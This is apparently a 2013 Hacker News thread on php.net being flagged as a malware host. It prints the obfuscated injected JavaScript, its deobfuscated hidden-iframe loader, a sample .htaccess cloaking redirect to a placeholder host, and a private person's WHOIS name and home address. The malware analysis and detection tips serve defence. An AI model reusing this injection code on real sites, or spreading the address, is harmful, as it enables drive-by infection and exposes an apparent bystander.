Php.net detected as a malware host by Google Safe Browsing (google.com)
176 points by nivla on Oct 24, 2013 | 168 comments

I work at Google and was the one who posted on our forums about this.

What our systems found was definitely a compromised JS file, and others on this thread have posted something similar to what we saw. This is not a false positive.

We have detailed help for webmasters in this kind of situation:


One thing that I strongly suggest to any webmaster in this situation is to look for any server vulnerability that allowed this file to get compromised in the first place. We sometimes see webmasters simply fix the affected files without digging into the security hole that allowed the hack, which leaves the server vulnerable to repeat attacks.

Happy to answer questions.

From the diagnostics page (http://www.google.com/safebrowsing/diagnostic?site=http://ph...):

>> Malicious software is hosted on 4 domain(s), including cobbcountybankruptcylawyer.com/, stephaniemari.com/, northgadui.com/.

What does this mean? How do these sites relate to php.net?

Probably javascript files planted on php.net are being pulled from servers behind those domains.

php.net allows users to post answers and examples of code throughout the website. Likely, one of the submission forms has/had a hole that allowed someone to submit or alter actual JS code.

This seems like a pretty darn good example of cross-site scripting... and possibly someone not sanitizing inputs?

No, not at all.

Thanks for the information. Can you confirm how long the malware has been on the site for, and if it's possible that people may have been drive-by'd before you flagged the domain? Also what systems did the malware target?


What we can share publicly is at this diagnostics page accessible to anyone (it's linked from the warning page browsers show):


Verified owners in Webmaster Tools get more info.

It's a pity you don't disclose which malware specifically the sites were distributing. As a user who may have been affected prior to google flagging it, it's frustrating to have no information on what to look for.

I think that you should direct your frustration towards the php.net admins and not Google.

It's linked further down the page.

Your link seems to indicate that the site isn't suspicious and hasn't served malware in the last 90 days; what changed?

When I go to that page I see: "Of the 1838 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-10-24, and the last time suspicious content was found on this site was on 2013-10-23."


As a student interested in security, will the js file be provided so we can examine and learn how this was done outside of privileged access?


Okay, looks like Safe Browsing says it is no longer suspicious. And I think someone already provided the JS file below.

Google's Safe Browsing looks pretty cool! Really powerful infrastructure. I wonder if they did this with VirusTotal? Can VirusTotal recognize this?

Another thing is that other search engines don't seem to have this built in. I wonder whether people using DDG will ever think about querying Google Safe Browsing.

Does Google provide an API (besides just querying Safe Browsing directly)?

Here is a pastebin which I found http://pastebin.com/XD0KyLxu

> Does Google provide an API (besides just querying Safe Browsing directly)?


I don't understand: you guys CLEARLY have the information on what, specifically, is causing the problem (which JS file, in this case). Yet for the site owner, you don't make it available? Or if it is, it's not at all easy to find the information. It's just this black box "go figure it out yourself" thing. Meanwhile you've essentially killed access to their site. Or is there something I'm missing?

They have access to the details; they posted that userprefs.js was to blame.

But wasn't that only after rasmus posted about it on Twitter? And how would that have worked out for someone not running such a high profile site as him?

No, such information is available to any webmaster who verifies their website ownership in Google's Webmaster Tools.

Once you're a confirmed webmaster for a given site, Google provides you with access to exactly which files are infected on your site. To provide that information publicly would open the site up to further exploitation.

You sir, get -9,001 Internets.

There are huge repercussions for any website that gets blacklisted with the Stop Badware clearinghouse, not least the inability to figure out exactly where the problem actually is, because the information the company you work for gives a webmaster to resolve the problem is ridiculously minimal. There are no notifications (unless you are signed up for Google Webmaster Tools), and restoring a website to normal globally can take anywhere from 48 hours to two weeks. There are millions of developers who rely on the PHP website daily to perform their day jobs, and you've now made it that much harder for us to do our jobs.

Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything. Give the website owners 24 hours to resolve the issue before blacklisting the site. And give them a heck of a lot more information to go on than some vague text.

Also, there are several anti-virus vendors out there who use the clearinghouse database for their products...6 to 12 months after the original blacklisting. So this will happen all over again 6 to 12 months from now. Finding contacts for anti-virus vendors for removing domain blocks is a lot harder than removal from the blacklist on the Stop Badware site.

The CORRECT solution for this situation was to find a contact at PHP who could resolve the issue quickly and amicably. Seriously, how hard is it to locate Rasmus' e-mail address? Always try to find a human contact before using Stop Badware. You can chalk up using Stop Badware for the PHP website as the dumbest decision you've made this year. Hopefully this decision of yours will raise the ire of the Internet just enough to force the company you work for to revamp Stop Badware so it doesn't suck, Google Webmaster Tools so it doesn't suck, and the reporting tools for sending information to Stop Badware so they also don't suck.

Stop Badware needs a serious overhaul. At the very least, they should contact the contacts in the WHOIS record for the domain BEFORE doing anything.

Why? This isn't a responsible disclosure, "we found a potential vulnerability but we don't know if it's being exploited yet" kind of situation. This is a "there's a real threat to anyone visiting that site via your search engine right now" kind of situation.

As a user, I'd be much happier if the search engine flagged this immediately.

As a site owner, if someone found malware on my site I'd want to know ASAP too. Obviously it would be helpful if they sent me a notification and made the specific details of the identified threat available. However, I could hardly criticise them for blacklisting my site while it should be blacklisted, or for claiming that we were dangerous while we were actually serving malware.

Not clearing up the blacklists promptly after the threat is identified and removed is an entirely different question. If you're going to go around blacklisting sites then I think you also have a responsibility (and, for that matter, you should also have a legal obligation) to remove them from the blacklist with similar efficiency if you're notified that the threat has been removed. Claiming that someone's site is dangerous when it isn't is defamatory, and should be treated as such.

Google is not doing this as a service to the website, they are doing it as a service to the user. Giving the owner some kind of grace period to fix the issue could mean hundreds of thousands of people could get hit with a malicious script in the meantime.

> You sir, get -9,001 Internets.

Cut this shit out, you're not on reddit.

If Google waited 24 hours before blacklisting a site, how many people would be infected during the grace period?

It's incorrect to say that Google doesn't attempt to contact the site owner. According to the Webmaster Tools support site [0], Google will send notices to several common email addresses when it blacklists a site.

[0]: https://support.google.com/webmasters/answer/163633?hl=en#2

> Seriously, how hard is it to locate Rasmus' e-mail address?

Why should Google do that? Because it's Rasmus? They don't have to do that, period.

The CORRECT SOLUTION is to protect users FIRST and not allow the site to infect more computers.

IT IS NOT Google's responsibility to warn webmasters if their sites are infected (though they can be warned by email automatically).

IT IS the webmaster's responsibility to audit his website's security, which obviously did not happen with php.net. If they get punished for that, that's FAIR, because it will force them to take security more seriously.

[edit] It's high time people moved from httpd to something else like nginx. httpd is insecure by default; this is not how you deal with security. As for PHP, since it doesn't promote any good security practices by default, it should be avoided.

Are you seriously suggesting that Google should not immediately block a website when they detect malware on it... because millions of people are using that site?

I don't understand your suggestion that Google should have waited to protect their users from a site that is serving malware. Why would that be a good idea?

"We know that your child has a bad contagious cold, but don't worry, you can still bring him to school for 24 hours and infect other people."

> You sir, get -9,001 Internets.

A million times THIS!

Everybody seems to laugh and rage about this, but could somebody tell me if this is correctly detected or not? I would not be surprised at all if somebody had breached php.net. Did they properly check against intrusions?

It's weird. The file linked to in the google product forums (http://static.php.net/www.php.net/userprefs.js) definitely has a piece of obfuscated js to insert an iframe pointing to http://lnkhere.reviewhdtv.co.uk/stat.htm. The actual http://www.php.net/userprefs.js does not though.

It was changed to un-confuse whatever tool Google is using. No version on GitHub has obfuscated contents (see: https://github.com/php/web-php/commits/master/userprefs.js) but it does include another file (https://github.com/php/web-php/commits/master/functions.js) which did have obfuscated contents. Where did the version that inserts the iframe to the UK site come from?

1) When I go to static userprefs.js on my mobile, no obfuscated contents.

2) Now when I browse to static userprefs.js on my desktop in incognito mode, no obfuscated contents.

3) When I browse to static userprefs.js in normal mode, I get the following JS appended:

    (function (MH) {
        var aS = "\x96\xad\xa1\xb4\x87\xf8J\x04Y.C\xb4u>\xac\xa8\x95\xbd\x04x\x8e\xa6:\x8c\x00O\x0b`\x04\x20-M@O\x00\x0d+\x0c\x0b\x04IM\x00d\x0fhbH"+
            Z7 = ["\x73\x70\x6c\x69\x74", XC = 0x09 * 17, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
            Jm = "\xd5\xb6\xf9\x89\x9eT\x1a\xe4\x9a\x87\xd3\x16r\xa4\x99}Q\x8c\xc8\xe3t\xf4\xf9\xedC",
            jS = aS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, Jm[Z7[2]]);
        UVf = function (wD) {
            var Np, uK, Ugx = uK = "",
                DUB = 0;
            wD = wD[Z7[0]](Ugx);
            for (Np in wD) {
                if (wD[Z7[3]](Np)) {
                    uK += pVH(wD[Np], jS[Z7[0]](Ugx)[DUB %= jS[Z7[2]]]);
            return (uK);
        jS = UVf(Jm);
    })(window, pVH = function (g6D, FFl, LyS, mnT) {
        g6D = g6D[LyS = "\x63" + (mnT = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
        return (String["\x66\x72\x6f\x6d\x43" + mnT](g6D & XC | ((g6D & (~XC & 0xff)) ^ (FFl[LyS](0) & (~XC & 0xff)))))

4) When I control F5 the page to refresh, obfuscated contents are gone.

So I'm leaning towards it being hacked a while ago and the hacked version was in my cache.

This code deobfuscates basically to

        tmp3 = (tmp2 = document.createElement('iframe')).style;
        tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
        tmp1 = (tmp0 = document.createElement('div')).style;
        tmp1.width = tmp1.height = '-10000px';
        tmp1.overflow = 'hidden'; tmp1.position = 'absolute'; tmp1.left = '-10000px';
        tmp4 = document.getElementsByTagName('div');
        tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
Wrapped into onload.
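
The per-character transform in pVH above is a masked XOR: the bits selected by the mask XC (0x09 * 17 = 153) are copied through from the input byte, and the remaining bits are XORed with a key byte, so the same routine both encodes and decodes. A readable sketch (function and variable names are mine, not the sample's):

```javascript
// Readable reconstruction of the sample's masked-XOR string transform.
// Bits in MASK pass through unchanged; the rest are XORed with a repeating key.
const MASK = 0x09 * 17; // the sample's XC (= 153)

function mixChar(c, k) {
  const inv = ~MASK & 0xff; // bits NOT covered by the mask
  return (c & MASK) | ((c & inv) ^ (k & inv));
}

function mix(text, key) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    out += String.fromCharCode(
      mixChar(text.charCodeAt(i), key.charCodeAt(i % key.length))
    );
  }
  return out;
}
```

Because XOR is its own inverse on the unmasked bits, mix(mix(s, key), key) === s, which is why the sample only needs one routine to unpack its payload strings.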

I really love that part where a random div is selected for inserting the iframe...

If there is one. Could be a little more robust :)

Obviously the hackers have a thing about non-semantic markup :-)

(yes, yes, I know that DIVs aren't really non-semantic - it's a joke)

Would CSP solve this issue? Looks like we could try restricting iframe-src?

But if they are able to hack into the server, I suppose there is nothing to do then...

If php.net used CSP, they would have been able to mitigate this attack with the frame-src directive [1].

[1] http://www.w3.org/TR/CSP/#frame-src
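
For illustration, a policy along these lines would stop the page from embedding frames from unlisted origins (the source lists here are hypothetical, not php.net's actual policy):

```
Content-Security-Policy: default-src 'self'; script-src 'self' static.php.net; frame-src 'self'
```

With such a header, the browser would refuse to load the injected iframe pointing at lnkhere.reviewhdtv.co.uk, since that origin isn't in frame-src.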

If they are able to hack the physical box (I assume this is how they did the injection), then it is possible for them to modify the CSP rule too.

If my assumption is correct, then CSP won't help unless we separate the source server and the proxy server from each other.

In my experience, these contents are only served once per IP, and then you're filtered so you don't get the content again, to prevent 'easy' detection.

You simply get blacklisted after the first serving.

Yeah, I ran across malware once that only injected JS for visitors from certain referrers, such as Google search. I believe the intention was so that when someone would tell me, "Hey, you have a bunch of weird links on your site" I would go to it directly and not see a problem. IIRC the .htaccess had been modified.
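
Referrer cloaking like that is typically just a few mod_rewrite lines dropped into .htaccess. A hypothetical sketch of what such an injected rule can look like (the redirect target and conditions are invented for illustration):

```
# Hypothetical injected rules: only visitors arriving from a search engine
# are redirected to the payload; direct visits look normal.
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule .* http://malicious.example/landing.php [R=302,L]
```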

I've seen this sort of thing from the Darkleech apache module[1]. It also won't show the malicious Javascript to any IP that appears in the `last` log. It looks like php.net uses Apache too[2]. The easiest way I've seen to find the module (they come with a variety of names) is to do something like

  strings /path/to/modules/* | grep -i blacklist
[1] http://malwaremustdie.blogspot.com/2013/03/the-evil-came-bac...

[2] http://builtwith.com/php.net

What a mess. I hope running Chrome via EMET is enough to keep my machine safe.

I've noticed that hacks have gone up recently in my little part of cyberspace. Things like Cryptolocker are so profitable that it's motivating a lot of talented guys to get into malware and hack servers. Usually servers running some unpatched CMS or module.

Found some more interesting stuff down the rabbit hole:


This is very interesting. Thanks for the code.

The obfuscated code in functions.js in the git repo is very strange, too... What did it do and why was it obfuscated? https://github.com/php/web-php/commit/06a06b561aa2fcf22ce52b...

It's a quick ref of functions for an autocomplete list.

If you have this in your html as the only form:

    <form>
      <input type="text" id="pattern"/>
      <input type="text" id="show" value="quickref" />
    </form>
    <script>
      document.forms[0].pattern = document.getElementById('pattern');
      document.forms[0].show = document.getElementById('show');
    </script>
then include the functions JS, you will see an autocomplete list of functions when you type into the pattern box. The lists of function names are stored in a compressed string at the top, so it's not really obfuscated, just minified. They shouldn't store it minified, though.

That's so weird. Why wouldn't they just use HTTP gzip?

Both files appear identical to me. Which is odd, since there is only 1 CNAME to an address with 1 A record. Perhaps your version of static.php.net is cached by your ISP?

Even with only one public-facing address there could be more than one server handling the content. It could be that only one had a bad file, or they all did but that one is yet to be cleaned. Or, as you say, the bad file could be cached at the ISP level (if this only affected one ISP, which obviously it didn't, it could even have been injected at that point rather than at php.net's resources).

Not for me. Both urls have exactly the same content, and nothing suspicious.

Could this be a DNS issue, with a different server serving the bad .js file?

My IP for static.php.net is

Maybe you already visited the site once and received the payload previously?

This comment by a Google employee seems to suggest that it wasn't incorrectly flagged:


It was definitely hacked... the log shows that the size of userprefs.js changed multiple times in the past 25 hours: http://lerdorf.com/static.log.gz

The site that is linked to in the obfuscated code is http://lnkhere.reviewhdtv.co.uk/stat.htm and it is that site which Google has marked as unsafe. Php.net has received the malware warning as a result.


Notably, the whois on that domain includes the registrant's full name and address. Nominet allows personal registrants an opt-out on the full details in whois, so you would be unlikely to try and hack PHP.net and forget to use a privacy service on a domain name that is quite so traceable...

The domain record for that site show:

  Domain name:
      Oli Bachini
  Registrant type:
      UK Individual
  Registrant's address:
      Rainbow Cottage
      West Perry
      PE28 0BX
      United Kingdom
      Webfusion Ltd t/a 123-reg [Tag = 123-REG]
      URL: http://www.123-reg.co.uk
  Relevant dates:
      Registered on: 13-Oct-2010
      Expiry date:  13-Oct-2014
      Last updated:  06-Oct-2012
  Registration status:
      Registered until expiry date.
  Name servers:
  WHOIS lookup made at 11:44:39 24-Oct-2013

While this is publicly available information, I'm not sure what purpose it serves to post it here as they are quite possibly an innocent bystander.

You are just making them a target for malicious people who would otherwise be too lazy to find that information.

It is pretty bad form to post people's personal addresses on a forum such as this.

Whois data is public in any case, so there's no harm in re-posting it.

>> While this is publicly available information

>> You are just making them a target for malicious people who would otherwise be too lazy to find that information.

I already addressed that.

That site probably was hacked, too.

And this comment probably is too; who can we trust - am I the only one seeing this comment? Will it disappear after reload? WOhaa.


  $ zcat ~/Downloads/static.log.gz |
  perl -lne'if (m/ 200 (\d+)/) { print $1 }'|sort |uniq -c
    390 0
    523 10881
    639 12479
  16276 1279
 178111 2602
      1 4071
     14 4072
     63 4801
    112 4812
   9431 5097
  27654 5821
    110 5911
   1348 6008
    162 7884
    256 8278
    568 9035
   1103 9634
That's a lot of changes.

You seem to be counting all the files, not just this one file.

Update: no, you're correct, this log apparently only has one file.

It is a false positive, as can be seen here: https://twitter.com/rasmus/status/393258147025932288/photo/1 Basically it is complaining about a JS file that is actually meant to be there.

What if the JS file itself was replaced?

@icebraining, you're right! The file has indeed been changed a lot lately. In fact, as can be seen here: http://lerdorf.com/static.log.gz that file changed in size from 2602 bytes to 5821 to 1279, all in the space of 25 hours... that is really suspicious.

Not sure why they think it's a false positive... I know server logs don't lie.

Err, often they do. Or more correctly, they often don't show something you think they would if it happened.

Logs show a subset of what has happened. There's no way to prove they are showing everything, so there's no way to use them to prove what did not happen.

Only if you misread the message; Google is saying "the following piece of code injects things", not "this is the exact code that injects things".

I'd say the tool is broken:


It reports google.com for 142 exploit(s), 131 trojan(s), 98 scripting exploit(s)

I'd say you're wrong. Google hosts user-created content that could (and likely did) contain malware at, for example, sites.google.com: http://www.google.com/safebrowsing/diagnostic?site=http://si...

For php.net, it reports a mere 4 trojans. So php.net is almost 100 times safer than google.com, according to this tool. That sounds pretty good :)

> For php.net, it reports a mere 4 trojans. So php.net is almost 100 times safer than google.com, according to this tool. That sounds pretty good :)

Compare how many google.com pages have been tested with how many php.net pages have been tested, and stop with that nonsense.

You are confident enough in Google's ability to have perfect security on all pages that you think the tool is broken when it says that is not true?

That query probably contains all subpages in google.com, which I imagine have been exploited in some fashion. Google isn't perfect.

There seems to be some controversy here, and one of our research systems found the same problem. So here's a quick post and a link to the full pcap so you can see for yourselves.



Not sure if you're associated with that site, but it's kinda hard to read that article: http://imgur.com/lyeZ9qZ

Windows, Firefox 24.0

ugh, yeah, I'm just a bit associated with it :)

I think our social media coordinator got a little happy with the options. For now disable JS to get a nice read, I'll see about getting that fixed.

EDIT: fixed, looks like last update of WP-Socializer introduced the bug. Disabled for the time being. Thank you and sibling poster for pointing it out.

I'm using Firefox 24 for OS X and the vertical bar with social media buttons floats over the center of that site's content, making it unreadable.

Interesting that satnavreviewed.co.uk, cobbcountybankruptcylawyer.com, stephaniemari.com, and northgadui.com are all owned by the same GoDaddy account.

Yeah, presumably the one godaddy account got hijacked, then used as a host for the malicious file.

A good reminder that anyone's low-profile website may not seem a tempting target, but it's still very much at risk.

This is what happens when you give too much power to one company. And what is the appeal process? Asking for help on Twitter as the founder of a huge project like PHP? https://twitter.com/rasmus/status/393258264034422785

This is what happens when you give too much power to one company.

What happens? Is it bad that Google protects users from malware and notifies webmasters that their website was compromised?

It's very heavy handed. It has not been 100% verified that the site was compromised, and a lot of very technically smart PHP community members are looking hard at this. It may prove to be a false positive or otherwise, but in the meantime:

1. Google is blocking access to the site in Chrome.

2. Firefox is warning users that php.net is not to be trusted (it uses the same list of infected sites provided by Google).

3. Google is warning users on Google Search that "This site may harm your computer.".

4. Google's appeals process is slow and cumbersome.

So yeah, that is a lot of power for one company.

If this happened to your website due to, for example, a false positive, you would be pretty unhappy. Only a high-profile project like PHP gets this kind of attention, but I'd happily wager that many smaller websites suffer the same fate every day.

This is exactly what happens when your website serves malware. Unhappy about it? Don't serve malware from your website.

When your website serves what Google considers malware, you mean.

And what about the false positive scenario?

A site we once had under development was incorrectly flagged. I reported the error via the webmaster tools and after less than 20 minutes, the warning went away.

I don't know. Any examples? Perhaps, you should ask the victims of such false positives.

If you can find any.

Google doesn't notify anybody, you have to find out for yourself the hard way.

And after that, it forces the owners of the site to register with Google and use Google services just to even figure out why, and to get their sites unflagged. And that is after the owner even figured out how and where to contact Google.

Yes, they do. If you've signed up for Webmaster Tools, you'll get notified by email.

They don't force anyone to sign up. If you do nothing other than fixing your website, eventually Google will check it again and remove from blacklist.

Seriously, what's your complaint? If you don't want to get blacklisted, don't let your site be hacked. If your site is hacked, and you're complaining that Google blacklisted it and notified you about it, you're dumb.

And guess what -- they provide this service (and also pay the real person to review your re-listing request) for FREE.

Google sends out emails to a bunch of different addresses like webmaster@domain.com, abuse@domain.com, etc and notifies anyone signed up through Google Webmaster tools. The only improvement I can think of would be if they notified whoever was listed after doing a WHOIS of the domain but that's a little hard to automate.

>And after that, it forces the owners of the site to register with Google and use Google services just to even figure out why, and to get their sites unflagged.

Google forces you to prove that you own the domain before they give you any information that they don't release publicly. How else do you suggest they go about not releasing everything publicly? Also, all you have to do as a site owner is click on the safe browsing diagnostic link and go from there.

In our case the email alerts went out 12 hours after they identified our site and started giving the warning to users. We got several calls from customers before being notified by Google.

Webmaster Tools really needs some improvements - there is no way to re-scan a suspect page quickly or get more info about the issue. If even Rasmus was unable to get this resolved fast, imagine regular webmasters in the same situation.

Hey, PHP isn't perfect, but calling it malware seems over the top! /rimshot

Thank you, thank you, ladies and gentlemen, I'll be here all week!

ba dum tss

But in all seriousness, php is not the bad guy here, bad coders are.

Are you referring to the people who implemented PHP? Because I would be.


This is not about PHP. It's about blocking an innocent website :)

Innocence has yet to be proven. Right now it's looking like static.php.net might have been compromised.

A site I visit frequently was once identified as containing malware. I overrode it and went there anyway. (In firefox.)

And now forevermore the icon for that site in the url-bar dropdown is the warning icon, and I have not been able to find out how to change it back to the normal one.

Favicon caching is extremely aggressive in Firefox. In the past, visiting the URL of the favicon and pressing Ctrl+F5 was enough. Nowadays, you have to clear your cache [1] and then restart your browser.

[1] Tools -> Options -> Advanced -> Network -> Cached Web Content -> Clear Now

Explicitly visit the url of that favicon in the browser and hard reload the page. That usually works for me.

The icon is correct in tabs (and by correct I mean not there - the site has no favicon), it's only incorrect in the url-drop down (the arrow in the url box which shows you the most visited pages).

That's a pretty outdated mirror :)

7 months in "web years" is pretty old, but as you know PHP has been around a long time, so there's still a lot of relevant information for those who depend on the site.

Well, somebody screwed up here. Maybe PHP core developers should concentrate on the security of their own website; it's more than embarrassing. There is no reason why php.net should use anything more than a static site generator.

From the headers, php.net seems to be Apache/PHP on BSD. This might be an example of a widespread ongoing attack pattern which is a bit of a mystery.

For the past year or more there have been compromises in this pattern - Linux/unix platform, Apache webserver; foreign Javascript or PHP gets inserted somehow; and/or in some cases the server binary is replaced. Sample article: http://arstechnica.com/security/2013/04/exclusive-ongoing-ma... - you can find more on this.

The big question is how the original exploit happens. It may be a long-out-there 0-day, or some admin tool that the sites have in common, or credentials taken from compromised boxes of developers, or something else.

Edited to update info.

This happened to http://www.iphonedevsdk.com a while ago and did a good job of tarnishing its reputation, all as a result of an arbitrary flag.

Didn't iphonedevsdk.com end up hosting a clientside exploit that got attackers onto the internal networks of Facebook and Twitter?

Serious question: this "arbitrary flag" would possibly be in reference to this widely-reported watering hole attack[1] (or was that attack misreported?), or are you referring to some other issue with that web site?

[1] http://arstechnica.com/security/2013/02/dev-site-behind-appl...

So was the site of the Thai Police, with information on how to get a police clearance. Very confusing. However, it seems to be fixed now.

An update has been posted on this: http://php.net/archive/2013.php#id2013-10-24-1

tl;dr: Relevant services moved to new servers; investigation continuing. Post mortem to follow once that's done.

Ha I live in Cobb County I wonder if that's a good bankruptcy lawyer.

False positives are the life of security. Microsoft Updates (update.microsoft.com) was just blacklisted by malwaredomains this week. It happens. Algorithms are not humans.

This was a true positive.

Malware detectors are usually right if overzealous.

This relates to the website, but maybe there should be malware warnings for programming languages too ;-)

If someone managed to compromise something like the PHP binaries they could cause a lot of damage.

Main php.net site doesn't have binaries, only sources. windows.php.net has Windows binaries, other sites - like Linux distros - have others.

All php releases are signed and checksummed on the d/l page.

I wouldn't imagine anyone downloading php binaries from php.net gives the remotest fig about security so I'm not sure why it would matter.

Hm, so is my Firefox getting this list directly from Google or how does it work?

Yes, Firefox downloads a list of suspicious sites from Google every 30 minutes. It uses the Google Safe Browsing Protocol --


Nitpick: it's a list of hashes of suspicious URLs.

They should have already fixed it; the file they are mentioning, "userprefs.js", is not harmful.

Maybe they used PHP to create the site. :)

What's the news from the http://php.net/ webmaster?

yup, can we please have some official voice provide a bit of background data here?!

Sure, there are many reasons to dislike PHP. But I wouldn't go as far as to call it malware.

still funny ;)

If so, that means Facebook is also malware :D

Facebook hardly uses the PHP interpreter; they have their own PHP VM, HHVM.

Considering the compromise was a JS script and most likely had nothing to do with PHP, neither of these comments is relevant.

According to Twitter post by Rasmus (https://twitter.com/rasmus/status/393258264034422785) this has been like this for at least 1 day and still has not been fixed. Something tells me that Google has way too much power and the fact that they don't sort out false positives in a timely fashion is really bad.

PHP webmasters didn't fix the issue and you're complaining about Google?

According to one of the people responsible for a software project that has been plagued by security holes for ~15 years, and whose website was hacked, and who hasn't fixed it...

Yeah, that's definitely a problem with google alright. Just because the entire PHP team disregards security completely, doesn't mean the consequences of that are google's problem. The fact that they just assume it is a false positive and don't even bother to verify their hacked site is incredible.

It is not surprising.

Why? See the sources of the php.net project for this site.

Yeah, what gives?

Honestly, I feel like there is nerd rage here; php.net should in no way ever be flagged as malware. Clearly a failure in Google here.

Not sure if you're joking or lacking knowledge. Just because it's the official PHP site absolutely does NOT mean it cannot contain malware. Legitimate sites are compromised and used to spread malware all the damn time.

But in this case it looks like Google's tool found a legitimate but obfuscated file, which was loaded in a tricky way that bad sites usually use, and decided it was malware.

mysql.com was hacked via SQL injection [0]. microsoft.com had XSS vulnerabilities a while back that allowed auth token harvesting via overly generous cookie paths [1].

Any website in the world has the potential to be flagged as serving malware.

[0] http://www.pcworld.com/article/240609/mysqlcom_hacked_to_ser... [1] http://www.marw0rm.com/xss-flaw-on-office-microsoft-com-disc... etc

One reason I migrated away from PHP is that there are simply way too many attack vectors. Using a framework helps quite a bit, but it is too easy to misconfigure a stock PHP install. Not saying that is the case here, though.

We have no proof that this is related to the domain being blacklisted by Google.

It's "tagged" by Google. When I search php from the iPhone I get:

"PHP: Hypertext Preprocessor


This site may harm your computer.

Server-side HTML embedded scripting language. It provides web developers with a full suite of tools for ..."

Google inserts the "harm" note.

Yes, but there are quite a few ways to get flagged by Google.

You are correct. Like I said, I doubt that is the case. PHP can be very secure if configured correctly.

That's the issue: PHP should be secure (i.e. restrictive) by default, Linux-style... it is not. PHP + Apache is a recipe for disaster. PHP is a templating language, yet it doesn't do HTML escaping by default!
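A two-line illustration of what default escaping buys you (Python's `html.escape` stands in here for any template engine's auto-escaping; the payload string is made up):

```python
from html import escape

user_comment = '<script>alert("pwned")</script>'

# Unescaped: the browser executes the submitted script (stored XSS).
unsafe = "<p>" + user_comment + "</p>"

# Escaped: the payload renders as inert text. Template engines with
# auto-escaping (Django, Twig, ...) apply this to every variable by default.
safe = "<p>" + escape(user_comment) + "</p>"
```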

95% of compromised websites are PHP ones.

That's the reason PHP will eventually die: businesses will understand that while it's cheap to go online with a PHP CMS, once you get hacked it can cost you your business.

You do realize this is a JavaScript exploit? Just sayin'.

You'd have to be pretty stupid to think this is exploiting some sort of PHP bug.

OMG! Did I just defend PHP? Gotta go take my medication.

Yes. It was more of a general statement.

And how did the JS exploit end up on their servers? Through PHP code, likely.

That's speculation. I've seen servers get compromised due to FTP problems, SSH misconfiguration, unpatched Apache vulnerabilities, third-party stats monitoring software with 0-days and even SQL injection.

Defacement (I consider malware injection a form of defacement) isn't unique to PHP by a long shot.

This is ridiculous speculation on your part, you can't speculate with security, for all you know the webmaster's ex-girlfriend could have inserted the malware.

And now that you've escaped from PHP, are you using prepared SQL statements?

Using the Django ORM. If you haven't used an ORM before, you are missing out.

... you know PHP's supported PDO for a while now, right?
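For reference, this is what a bound parameter buys you; a sketch of the principle in Python's sqlite3 (PDO's `prepare`/`execute` with placeholders works the same way; the table and payload are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

attacker = "' OR '1'='1"

# String concatenation: the payload rewrites the query and matches every row.
unsafe_rows = conn.execute(
    "SELECT * FROM users WHERE name = '" + attacker + "'"
).fetchall()   # returns [('alice',)]

# Bound parameter: the driver treats the payload as a plain string value,
# so it never becomes part of the SQL text and no rows match.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (attacker,)
).fetchall()   # returns []
```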

When many attacks occur, it gets more interesting...

curious what you are using now?

Currently using Django. Since I started playing around with it I haven't looked back. Although I am told CakePHP and a few other frameworks really do improve PHP.

They don't improve PHP; you still have to deal with PHP's shortcomings even with a framework. But since you don't deal with low-level stuff, your code might be more secure, yeah.

PHP has too many insecure APIs accessible to beginners.

With Django, for instance, you have a view layer with auto-escaping by default, and you don't write insecure SQL queries by hand. That makes a huge difference.

I'm tempted to say: they improve programmers.
